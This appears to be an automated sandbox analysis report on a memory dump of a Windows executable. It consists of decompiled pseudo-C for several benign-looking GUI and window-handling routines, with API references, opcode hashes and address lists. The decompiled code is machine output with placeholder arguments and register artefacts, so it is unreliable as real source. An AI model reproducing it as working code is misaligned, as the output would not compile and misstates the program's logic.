0x004343aa 0x004343b5 0x004343b5 0x004343a8 0x004343cf 0x004343d4 0x004343e0 0x004343e3 0x004343e7 0x00000000 0x00000000 0x0043440b 0x0043440c 0x0043440c 0x0043440d 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x0043440d 0x004343f2 0x004343fa 0x00434401 0x00434401 0x0043430a 0x0043430a 0x0043430b 0x00434775 0x00434776 0x00434778 0x00000000 0x0043477a 0x0043477a 0x0043477b 0x0043477b 0x0043477d 0x00434787 0x0043478f 0x00434792 0x00434795 0x00000000 0x00000000 0x0043479f 0x004347a4 0x004347a6 0x004347b4 0x004347b5 0x004347b5 0x004347b6 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x004347a6 0x004347ad 0x004347ad 0x00434311 0x00000000 0x00434311 0x0043430b 0x00434308 0x00000000 0x004342de 0x004342de 0x0043431c 0x0043431d 0x0043431f 0x00000000 0x00434325 0x00434325 0x00434326 0x00434326 0x00434328 0x0043432d 0x00434336 0x0043433b 0x0043433d 0x00000000 0x00000000 0x00434343 0x00434344 0x00434344 0x00434345 0x00000000 0x00434347 0x00000000 0x00434347 0x00000000 0x00434345 0x00434328 0x00000000 0x004342e0 0x004342e0 0x004342e3 0x00434527 0x00434530 0x00434531 0x00434533 0x00000000 0x00434539 0x00434539 0x0043453a 0x0043453a 0x0043453c 0x00434553 0x00434556 0x0043455a 0x00000000 0x00000000 0x00434622 0x00434623 0x00434623 0x00434624 0x00000000 0x0043462a 0x00000000 0x0043462a 0x00000000 0x00434624 0x0043456c 0x00434571 0x00434572 0x00434577 0x0043457a 0x00434589 0x0043458e 0x0043458f 0x00434594 0x00434597 0x004345a3 0x004345b8 0x004345d1 0x004345d8 0x004345db 0x004345de 0x004345e3 0x004345e8 0x004345fd 0x004345fd 0x004342e9 0x004342e9 0x004342ea 0x00434632 0x0043463b 0x0043463c 0x0043463e 0x00000000 0x00434644 0x00434644 0x00434645 0x00434645 0x00434647 0x0043465e 0x00434661 0x00434665 0x00000000 0x00000000 0x00434765 0x00434766 0x00434766 0x00434767 0x00000000 0x0043476d 0x00000000 0x0043476d 0x00000000 0x00434767 0x00434677 0x00434685 0x00434694 0x004346a2 0x004346ae 0x004346bc 0x004346c5 0x004346da 0x004346f4 0x004346f9 0x004346fc 0x004346ff 0x00434704 0x00434709 0x0043471b 0x0043471b 0x004342f0 0x004342f3 0x00434425 0x0043442e 0x0043442f 0x00434431 0x00000000 0x00434437 0x00434437 0x00434438 0x00434438 0x0043443a 0x00434446 0x00434449 0x0043444c 0x0043444f 0x0043447a 0x00434451 0x0043445e 0x0043445e 0x0043447d 0x00434481 0x00000000 0x00000000 0x00434517 0x00434518 0x00434518 0x00434519 0x00000000 0x0043451f 0x00000000 0x0043451f 0x00000000 0x00434519 0x00434499 0x0043449e 0x004344a0 0x004344a7 0x004344b2 0x004344b4 0x004344b4 0x004344b9 0x004344c1 0x004344c4 0x004344c6 0x004344cc 0x004344ce 0x004344d5 0x004344d5 0x004344e1 0x004344e8 0x00434504 0x0043450d 0x004344ea 0x004344fa 0x004344fa 0x004344e8 0x004344c6 0x004342f9 0x004347b8 0x004347cf 0x004347cf 0x004347d2 0x004347d4 0x004347d7 0x004347da 0x004347e7 0x004347e7 0x004342ea 0x004342e3 0x004342de 0x00000000

APIs

SaveDC.GDI32(?), ref: 00434584 RestoreDC.GDI32(?,?), ref: 004345F8 GetWindowDC.USER32(?,00000000,004347E8), ref: 00434672 SaveDC.GDI32(?), ref: 004346A9 RestoreDC.GDI32(?,?), ref: 00434716 DefWindowProcA.USER32(?,?,?,?,00000000,004347E8), ref: 004347CA

Strings

PSC , xrefs: 00434562, 0043468A

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSaveWindow$Proc String ID: PSC API String ID: 1975259465-3988711711 Opcode ID: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a Instruction ID: e2bc05db2e98f798f29eef0ec9ad69615c0f825a7202cf89475d9a585c1b255b Opcode Fuzzy Hash: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a Instruction Fuzzy Hash: E1E14C74A006059FCB10EFA9C5819AEF3F5EF8D304F619166E801A7361C738ED42CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E0044F3A8(intOrPtr __eax, struct HWND__** __edx) { intOrPtr _v8; int _v12; intOrPtr _v16; struct HDC__* _v20; struct HWND__* _v24; void* __ebp; struct HWND__* _t100; intOrPtr _t110; struct HWND__* _t111; intOrPtr _t115; intOrPtr _t116; intOrPtr _t132; intOrPtr _t135; struct HWND__* _t141; struct HWND__* _t144; intOrPtr _t148; struct HWND__* _t149; intOrPtr _t150; intOrPtr _t151; struct HWND__* _t153; struct HWND__* _t156; intOrPtr _t162; intOrPtr _t192; struct HWND__** _t221; void* _t224; struct HWND__* _t242; struct HWND__* _t243; struct HWND__* _t245; void* _t258; void* _t259; intOrPtr _t265; intOrPtr _t273; struct HWND__* _t277; struct HWND__* _t278; struct HWND__* _t279; struct HWND__* _t284; struct HWND__* _t285; struct HWND__* _t286; struct HWND__* _t287; void* _t289; void* _t291; intOrPtr _t292; void* _t294; void* _t298; _t289 = _t291; _t292 = _t291 + 0xffffffec; _t221 = __edx; _v8 = __eax; _t100 = *__edx; _t242 = _t100; _t294 = _t242 - 0x46; if(_t294 > 0) { _t243 = _t242 - 0xb01a; __eflags = _t243; if(_t243 == 0) { __eflags = *(_v8 + 0x94); if(__eflags != 0) { E00403B24(_v8, __eflags); } } else { _t245 = _t243 - 1; __eflags = _t245; if(_t245 == 0) { __eflags = *(_v8 + 0x94); if(__eflags != 0) { E00403B24(_v8, __eflags); } } else { __eflags = _t245 == 0x2c; if(_t245 == 0x2c) { _t284 = __edx[1]; _t277 = 0; while(1) { __eflags = _t284; if(_t284 == 0) { break; } __eflags = _t277; if(_t277 == 0) { _t277 = E0043747C(_t284, _t224); _t284 = GetParent(_t284); continue; } break; } __eflags = _t277; if(_t277 != 0) { _t285 = E0044CE28(_t277); _t110 = _v8; __eflags = _t277 - *((intOrPtr*)(_t110 + 0x268)); if(_t277 != *((intOrPtr*)(_t110 + 0x268))) { L28: __eflags = _t285; if(_t285 != 0) { __eflags = _t285 - _v8; if(_t285 == _v8) { L31: _t111 = *(_t285 + 0x268); __eflags = _t111; if(_t111 != 0) { __eflags = _t277 - _t111; if(_t277 != _t111) { __eflags = 0; E0043BC9C(_t111, 0, 8, 0); } } *((intOrPtr*)(_t285->i + 0xf8))(); } else { _t115 = *0x466584; // 0x27c66a0 __eflags = _t285 - *((intOrPtr*)(_t115 + 0x68)); if(_t285 != *((intOrPtr*)(_t115 + 0x68))) { goto L31; } } } } else { _t116 = *0x466584; // 0x27c66a0 __eflags = _t277 - *((intOrPtr*)(_t116 + 0x64)); if(_t277 != *((intOrPtr*)(_t116 + 0x64))) { goto L28; } } } } else { goto L56; } } } goto L58; } else { if(_t294 == 0) { _t132 = _v8; __eflags = ( *0x44f87c & 0x0000ffff) - ( *(_t132 + 0x1c) & 0x0000ffff & *0x44f878); if(( *0x44f87c & 0x0000ffff) == ( *(_t132 + 0x1c) & 0x0000ffff & *0x44f878)) { _t135 = _v8; __eflags = ( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff; if(( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff < 0) { _t148 = _v8; __eflags = *((char*)(_t148 + 0x273)) - 2; if( *((char*)(_t148 + 0x273)) != 2) { _t149 = __edx[2]; _t34 = _t149 + 0x18; *_t34 = *(_t149 + 0x18) | 0x00000002; __eflags = *_t34; } } _t141 = ( *(_v8 + 0x278) & 0x000000ff) - 1; __eflags = _t141; if(_t141 == 0) { L45: _t144 = ( *(_v8 + 0x271) & 0x000000ff) - 2; __eflags = _t144; if(_t144 == 0) { L47: *( *((intOrPtr*)(_t221 + 8)) + 0x18) = *( *((intOrPtr*)(_t221 + 8)) + 0x18) | 0x00000001; } else { __eflags = _t144 == 3; if(_t144 == 3) { goto L47; } } } else { __eflags = _t141 == 2; if(_t141 == 2) { goto L45; } } } goto L58; } else { _t258 = _t242 + 0xfffffffa - 3; if(_t258 < 0) { __eflags = *0x4626c0; if( *0x4626c0 != 0) { __eflags = *__edx - 7; if( *__edx != 7) { goto L58; } else { _t150 = _v8; __eflags = *(_t150 + 0x1c) & 0x00000010; if(( *(_t150 + 0x1c) & 0x00000010) != 0) { goto L58; } else { _t286 = 0; _t151 = _v8; __eflags = *((char*)(_t151 + 0x277)) - 2; if( *((char*)(_t151 + 0x277)) != 2) { _t153 = *(_v8 + 0x268); __eflags = _t153; if(_t153 != 0) { __eflags = _t153 - _v8; if(_t153 != _v8) { _t286 = E004423F8(_t153); } } } else { _t156 = E0045015C(_v8); __eflags = _t156; if(_t156 != 0) { _t286 = E004423F8(E0045015C(_v8)); } } __eflags = _t286; if(_t286 == 0) { goto L58; } else { _t100 = SetFocus(_t286); } } } } goto L59; } else { _t259 = _t258 - 0x22; if(_t259 == 0) { _v24 = __edx[2]; __eflags = _v24->i - 1; if(_v24->i != 1) { goto L58; } else { _t162 = _v8; __eflags = *(_t162 + 0x290); if( *(_t162 + 0x290) == 0) { goto L58; } else { _t278 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0, *((intOrPtr*)(_v24 + 8))); __eflags = _t278; if(_t278 == 0) { goto L58; } else { _v16 = E004262D8(0, 1); _push(_t289); _push(0x44f6c1); _push( *[fs:eax]); *[fs:eax] = _t292; _v12 = SaveDC( *(_v24 + 0x18)); _push(_t289); _push(0x44f6a4); _push( *[fs:eax]); *[fs:eax] = _t292; E004268A4(_v16, *(_v24 + 0x18)); E00426738(_v16); E00434AAC(_t278, _v24 + 0x1c, _v16, *(_v24 + 0x10) & 0x0000ffff); _pop(_t265); *[fs:eax] = _t265; _push(0x44f6ab); __eflags = 0; E004268A4(_v16, 0); return RestoreDC( *(_v24 + 0x18), _v12); } } } } else { if(_t259 == 1) { _t287 = __edx[2]; __eflags = _t287->i - 1; if(_t287->i != 1) { goto L58; } else { _t192 = _v8; __eflags = *(_t192 + 0x290); if( *(_t192 + 0x290) == 0) { goto L58; } else { _t279 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0, *((intOrPtr*)(_t287 + 8))); __eflags = _t279; if(_t279 == 0) { goto L58; } else { _v20 = GetWindowDC(E004423F8(_v8)); *[fs:eax] = _t292; _v16 = E004262D8(0, 1); *[fs:eax] = _t292; _v12 = SaveDC(_v20); *[fs:eax] = _t292; E004268A4(_v16, _v20); E00426738(_v16); *((intOrPtr*)(_t279->i + 0x38))(_t287 + 0x10, *[fs:eax], 0x44f7ab, _t289, *[fs:eax], 0x44f7c8, _t289, *[fs:eax], 0x44f7ef, _t289); _pop(_t273); *[fs:eax] = _t273; _push(0x44f7b2); __eflags = 0; E004268A4(_v16, 0); return RestoreDC(_v20, _v12); } } } } else { L56: _t298 = _t100 - *0x46658c; // 0xc075 if(_t298 == 0) { E0043BC9C(_v8, 0, 0xb025, 0); E0043BC9C(_v8, 0, 0xb024, 0); E0043BC9C(_v8, 0, 0xb035, 0); E0043BC9C(_v8, 0, 0xb009, 0); E0043BC9C(_v8, 0, 0xb008, 0); E0043BC9C(_v8, 0, 0xb03d, 0); } L58: _t100 = E0043F7F4(_v8, _t221); L59: return _t100; } } } } } } 0x0044f3a9 0x0044f3ab 0x0044f3b1 0x0044f3b3 0x0044f3b6 0x0044f3b8 0x0044f3ba 0x0044f3bd 0x0044f3e2 0x0044f3e2 0x0044f3e8 0x0044f531 0x0044f538 0x0044f545 0x0044f545 0x0044f3ee 0x0044f3ee 0x0044f3ee 0x0044f3ef 0x0044f510 0x0044f517 0x0044f524 0x0044f524 0x0044f3f5 0x0044f3f5 0x0044f3f8 0x0044f479 0x0044f47c 0x0044f491 0x0044f491 0x0044f493 0x00000000 0x00000000 0x0044f495 0x0044f497 0x0044f487 0x0044f48f 0x00000000 0x0044f48f 0x00000000 0x0044f497 0x0044f499 0x0044f49b 0x0044f4aa 0x0044f4ac 0x0044f4af 0x0044f4b5 0x0044f4c5 0x0044f4c5 0x0044f4c7 0x0044f4cd 0x0044f4d0 0x0044f4e0 0x0044f4e0 0x0044f4e6 0x0044f4e8 0x0044f4ea 0x0044f4ec 0x0044f4f0 0x0044f4f7 0x0044f4f7 0x0044f4ec 0x0044f502 0x0044f4d2 0x0044f4d2 0x0044f4d7 0x0044f4da 0x00000000 0x00000000 0x0044f4da 0x0044f4d0 0x0044f4b7 0x0044f4b7 0x0044f4bc 0x0044f4bf 0x00000000 0x00000000 0x0044f4bf 0x0044f4b5 0x0044f3fa 0x00000000 0x0044f3fa 0x0044f3f8 0x0044f3ef 0x00000000 0x0044f3bf 0x0044f3bf 0x0044f54f 0x0044f564 0x0044f567 0x0044f56d 0x0044f578 0x0044f57a 0x0044f57c 0x0044f57f 0x0044f586 0x0044f588 0x0044f58b 0x0044f58b 0x0044f58b 0x0044f58b 0x0044f586 0x0044f599 0x0044f599 0x0044f59b 0x0044f5a5 0x0044f5af 0x0044f5af 0x0044f5b1 0x0044f5bb 0x0044f5be 0x0044f5b3 0x0044f5b3 0x0044f5b5 0x00000000 0x00000000 0x0044f5b5 0x0044f59d 0x0044f59d 0x0044f59f 0x00000000 0x00000000 0x0044f59f 0x0044f59b 0x00000000 0x0044f3c5 0x0044f3c8 0x0044f3cb 0x0044f3ff 0x0044f406 0x0044f40c 0x0044f40f 0x00000000 0x0044f415 0x0044f415 0x0044f418 0x0044f41c 0x00000000 0x0044f422 0x0044f422 0x0044f424 0x0044f427 0x0044f42e 0x0044f450 0x0044f456 0x0044f458 0x0044f45a 0x0044f45d 0x0044f464 0x0044f464 0x0044f45d 0x0044f430 0x0044f433 0x0044f438 0x0044f43a 0x0044f449 0x0044f449 0x0044f43a 0x0044f466 0x0044f468 0x00000000 0x0044f46e 0x0044f46f 0x0044f46f 0x0044f468 0x0044f41c 0x0044f40f 0x00000000 0x0044f3cd 0x0044f3cd 0x0044f3d0 0x0044f5ca 0x0044f5d0 0x0044f5d3 0x00000000 0x0044f5d9 0x0044f5d9 0x0044f5dc 0x0044f5e3 0x00000000 0x0044f5e9 0x0044f5ff 0x0044f601 0x0044f603 0x00000000 0x0044f609 0x0044f615 0x0044f61a 0x0044f61b 0x0044f620 0x0044f623 0x0044f632 0x0044f637 0x0044f638 0x0044f63d 0x0044f640 0x0044f64c 0x0044f65f 0x0044f677 0x0044f67e 0x0044f681 0x0044f684 0x0044f689 0x0044f68e 0x0044f6a3 0x0044f6a3 0x0044f603 0x0044f5e3 0x0044f3d6 0x0044f3d7 0x0044f6c8 0x0044f6cb 0x0044f6ce 0x00000000 0x0044f6d4 0x0044f6d4 0x0044f6d7 0x0044f6de 0x00000000 0x0044f6e4 0x0044f6f7 0x0044f6f9 0x0044f6fb 0x00000000 0x0044f701 0x0044f70f 0x0044f71d 0x0044f72c 0x0044f73a 0x0044f746 0x0044f754 0x0044f75d 0x0044f770 0x0044f783 0x0044f788 0x0044f78b 0x0044f78e 0x0044f793 0x0044f798 0x0044f7aa 0x0044f7aa 0x0044f6fb 0x0044f6de 0x0044f3dd 0x0044f7f6 0x0044f7f6 0x0044f7fc 0x0044f80a 0x0044f81b 0x0044f82c 0x0044f83d 0x0044f84e 0x0044f85f 0x0044f85f 0x0044f864 0x0044f869 0x0044f86e 0x0044f874 0x0044f874 0x0044f3d7 0x0044f3d0 0x0044f3cb 0x0044f3bf

APIs

SetFocus.USER32(00000000), ref: 0044F46F SaveDC.GDI32(?), ref: 0044F62D RestoreDC.GDI32(?,?), ref: 0044F69E GetWindowDC.USER32(00000000), ref: 0044F70A SaveDC.GDI32(?), ref: 0044F741 RestoreDC.GDI32(?,?), ref: 0044F7A5

Strings

PSC , xrefs: 0044F60B, 0044F722

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$FocusWindow String ID: PSC API String ID: 1553564791-3988711711 Opcode ID: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5 Instruction ID: 0feb47b636321289c6b1ee835d5db488161481ff91a5fcd85071049a3d22871c Opcode Fuzzy Hash: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5 Instruction Fuzzy Hash: C9C16030A00204DFEB11EF69C586A6FB7F5EF49704F6544B6E804AB361DB38AE05DB18

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E00442700(void* __eax) { void* _v28; struct _WINDOWPLACEMENT _v56; struct tagPOINT _v64; intOrPtr _v68; void* _t43; struct HWND__* _t45; struct tagPOINT* _t47; _t47 = &(_v64.y); _t43 = __eax; if(IsIconic( *(__eax + 0x1b4)) == 0) { GetWindowRect( *(_t43 + 0x1b4), _t47); } else { _v56.length = 0x2c; GetWindowPlacement( *(_t43 + 0x1b4), &_v56); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); } if((GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff0) & 0x40000000) != 0) { _t45 = GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff8); if(_t45 != 0) { ScreenToClient(_t45, _t47); ScreenToClient(_t45, &_v64); } } *(_t43 + 0x40) = _t47->x; *((intOrPtr*)(_t43 + 0x44)) = _v68; *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x; *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68; return E00439F28(_t43); } 0x00442703 0x00442706 0x00442716 0x00442745 0x00442718 0x00442718 0x0044272c 0x00442737 0x00442738 0x00442739 0x0044273a 0x0044273a 0x0044275d 0x0044276d 0x00442771 0x00442775 0x00442780 0x00442780 0x00442771 0x00442788 0x0044278f 0x00442799 0x004427a4 0x004427b4

APIs

IsIconic.USER32(?), ref: 0044270F GetWindowPlacement.USER32(?,0000002C), ref: 0044272C GetWindowRect.USER32 ref: 00442745 GetWindowLongA.USER32 ref: 00442753 GetWindowLongA.USER32 ref: 00442768 ScreenToClient.USER32 ref: 00442775 ScreenToClient.USER32 ref: 00442780

Strings

, , xrefs: 00442718

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect String ID: , API String ID: 2266315723-3772416878 Opcode ID: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e Instruction ID: 282360e0af41cb553a3d796231ab277cfe4c42851b7561e00cc4fa463f4feb2e Opcode Fuzzy Hash: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e Instruction Fuzzy Hash: EA117C71908340AFDB00DF6DC985A8B37D8AF49314F04467ABE58DB386D739E800CB66

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%

E00456830(void* __eax) { struct HWND__* _t21; intOrPtr* _t26; signed int _t29; intOrPtr* _t30; int _t33; intOrPtr _t36; void* _t54; int _t64; _t54 = __eax; _t21 = IsIconic( *(__eax + 0x30)); if(_t21 != 0) { SetActiveWindow( *(_t54 + 0x30)); if( *((intOrPtr*)(_t54 + 0x44)) == 0 || *((char*)(_t54 + 0x5b)) == 0 && *((char*)( *((intOrPtr*)(_t54 + 0x44)) + 0x57)) == 0) { L6: E004554C4( *(_t54 + 0x30), 9, __eflags); } else { _t64 = IsWindowEnabled(E004423F8( *((intOrPtr*)(_t54 + 0x44)))); if(_t64 == 0) { goto L6; } else { DefWindowProcA( *(_t54 + 0x30), 0x112, 0xf120, 0); } } _t26 = *0x462c28; // 0x466310 _t29 = *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1; if(_t64 < 0) { asm("adc eax, 0x0"); } _t30 = *0x462c28; // 0x466310 _t33 = *((intOrPtr*)( *_t30))(0, _t29) >> 1; if(_t64 < 0) { asm("adc eax, 0x0"); } SetWindowPos( *(_t54 + 0x30), 0, _t33, ??, ??, ??, ??); _t36 = *((intOrPtr*)(_t54 + 0x44)); if(_t36 != 0 && *((char*)(_t36 + 0x273)) == 1 && *((char*)(_t36 + 0x57)) == 0) { E00450A04(_t36, 0); E00453454( *((intOrPtr*)(_t54 + 0x44))); } E00455D1C(_t54); E00455DF8(_t54, 1); _t21 = *0x466584; // 0x27c66a0 _t59 = *((intOrPtr*)(_t21 + 0x64)); if( *((intOrPtr*)(_t21 + 0x64)) != 0) { _t21 = SetFocus(E004423F8(_t59)); } if( *((short*)(_t54 + 0x14a)) != 0) { return *((intOrPtr*)(_t54 + 0x148))(); } } return _t21; } 0x00456832 0x00456838 0x0045683f 0x00456849 0x00456852 0x0045688c 0x00456894 0x00456863 0x00456871 0x00456873 0x00000000 0x00456875 0x00456885 0x00456885 0x00456873 0x004568a1 0x004568aa 0x004568ac 0x004568ae 0x004568ae 0x004568b4 0x004568bd 0x004568bf 0x004568c1 0x004568c1 0x004568cb 0x004568d0 0x004568d5 0x004568e8 0x004568f0 0x004568f0 0x004568f7 0x00456900 0x00456905 0x0045690a 0x0045690f 0x00456919 0x00456919 0x00456926 0x00000000 0x00456930 0x00456926 0x00456938

APIs

IsIconic.USER32(?), ref: 00456838 SetActiveWindow.USER32(?,?,?,?,00456232,00000000,00456706), ref: 00456849 IsWindowEnabled.USER32(00000000), ref: 0045686C DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00456232,00000000,00456706), ref: 00456885 SetWindowPos.USER32(?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 004568CB SetFocus.USER32(00000000,?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 00456919

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicProc String ID: API String ID: 848842217-0 Opcode ID: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5 Instruction ID: 0ae515bd5538cf6c2b81134375036770536a1319b9b68df56a487dd4935c93fd Opcode Fuzzy Hash: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5 Instruction Fuzzy Hash: 68311270B012409BEB14BB69CD85B5A37986F04706F4904BAFD04DF2D7DA7DEC888719

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E00422EE0(void* __edi, struct HWND__* _a4, signed int _a8) { struct _WINDOWPLACEMENT _v48; void* __ebx; void* __esi; void* __ebp; signed int _t19; intOrPtr _t21; struct HWND__* _t23; _t19 = _a8; _t23 = _a4; if( *0x466339 != 0) { if((_t19 & 0x00000003) == 0) { if(IsIconic(_t23) == 0) { GetWindowRect(_t23, &(_v48.rcNormalPosition)); } else { GetWindowPlacement(_t23, &_v48); } return E00422E50( &(_v48.rcNormalPosition), _t19); } return 0x12340042; } _t21 = *0x466314; // 0x422ee0 *0x466314 = E00422CE4(1, _t19, _t21, __edi, _t23); return *0x466314(_t23, _t19); } 0x00422ee8 0x00422eeb 0x00422ef5 0x00422f1f 0x00422f30 0x00422f43 0x00422f32 0x00422f37 0x00422f37 0x00000000 0x00422f4d 0x00000000 0x00422f21 0x00422efc 0x00422f09 0x00000000

Strings

MonitorFromWindow , xrefs: 00422EF7 .B , xrefs: 00422EFC, 00422F09, 00422F10

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc String ID: MonitorFromWindow$.B API String ID: 190572456-3321143411 Opcode ID: dc8e35c407d82f6cceb83babe80fce9656be7aefb26f434311fe2d54a7a81e81 Instruction ID: 1636fd834bafad5518785d76de514a437e7accc22a945f91af0d7936cae42485 Opcode Fuzzy Hash: dc8e35c407d82f6cceb83babe80fce9656be7aefb26f434311fe2d54a7a81e81 Instruction Fuzzy Hash: 43018471A041687A9700EB54AF819AFB36CAB05304BC1412BF914A3242EBA89D0197BF

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0045676C(void* __eax) { long _t21; int _t37; int _t39; struct HWND__* _t41; void* _t46; _t46 = __eax; _t1 = _t46 + 0x30; // 0x0 _t21 = IsIconic( *_t1); if(_t21 == 0) { E00455CBC(); _t2 = _t46 + 0x30; // 0x0 SetActiveWindow( *_t2); E00455DF8(_t46, 0); if( *((intOrPtr*)(_t46 + 0x44)) == 0 || *((char*)(_t46 + 0x5b)) == 0 && *((char*)( *((intOrPtr*)(_t46 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E004423F8( *((intOrPtr*)(_t46 + 0x44)))) == 0) { _t15 = _t46 + 0x30; // 0x0 _t21 = E004554C4( *_t15, 6, __eflags); } else { _t37 = E0044EDA8( *((intOrPtr*)(_t46 + 0x44))); _t39 = E0044ED88( *((intOrPtr*)(_t46 + 0x44))); _t41 = E004423F8( *((intOrPtr*)(_t46 + 0x44))); _t13 = _t46 + 0x30; // 0x0 SetWindowPos( *_t13, _t41, _t39, _t37, *( *((intOrPtr*)(_t46 + 0x44)) + 0x48), 0, 0x40); _t14 = _t46 + 0x30; // 0x0 _t21 = DefWindowProcA( *_t14, 0x112, 0xf020, 0); } if( *((short*)(_t46 + 0x142)) != 0) { return *((intOrPtr*)(_t46 + 0x140))(); } } return _t21; } 0x0045676d 0x0045676f 0x00456773 0x0045677a 0x00456782 0x00456787 0x0045678b 0x00456794 0x0045679d 0x0045680b 0x0045680e 0x004567c0 0x004567ce 0x004567d7 0x004567e0 0x004567e6 0x004567ea 0x004567fb 0x004567ff 0x004567ff 0x0045681b 0x00000000 0x00456825 0x0045681b 0x0045682c

APIs

IsIconic.USER32(00000000), ref: 00456773 SetActiveWindow.USER32(00000000,?,00456FB0), ref: 0045678B Part of subcall function 00455DF8: EnumWindows.USER32(00455D88,00000000), ref: 00455E22 Part of subcall function 00455DF8: ShowOwnedPopups.USER32(00000000,?,00455D88,00000000,?,?,00460C02,00456799,00000000,?,00456FB0), ref: 00455E51 IsWindowEnabled.USER32(00000000), ref: 004567B7 SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567EA DefWindowProcA.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567FF

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows String ID: API String ID: 2995439034-0 Opcode ID: cdb4102744cc381e5219f4535f74b344f238140cf9e233f1330de880dcf3e2ad Instruction ID: 918584e1bd2c51baab3052e0e12fbe46b2eccfde8c42c3220052cef7c0f72eaf Opcode Fuzzy Hash: cdb4102744cc381e5219f4535f74b344f238140cf9e233f1330de880dcf3e2ad Instruction Fuzzy Hash: B011EF70A012009BEB54FF6ACAC6B5637A96F04305F4900BABE04DF29BD67DDC849728

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%

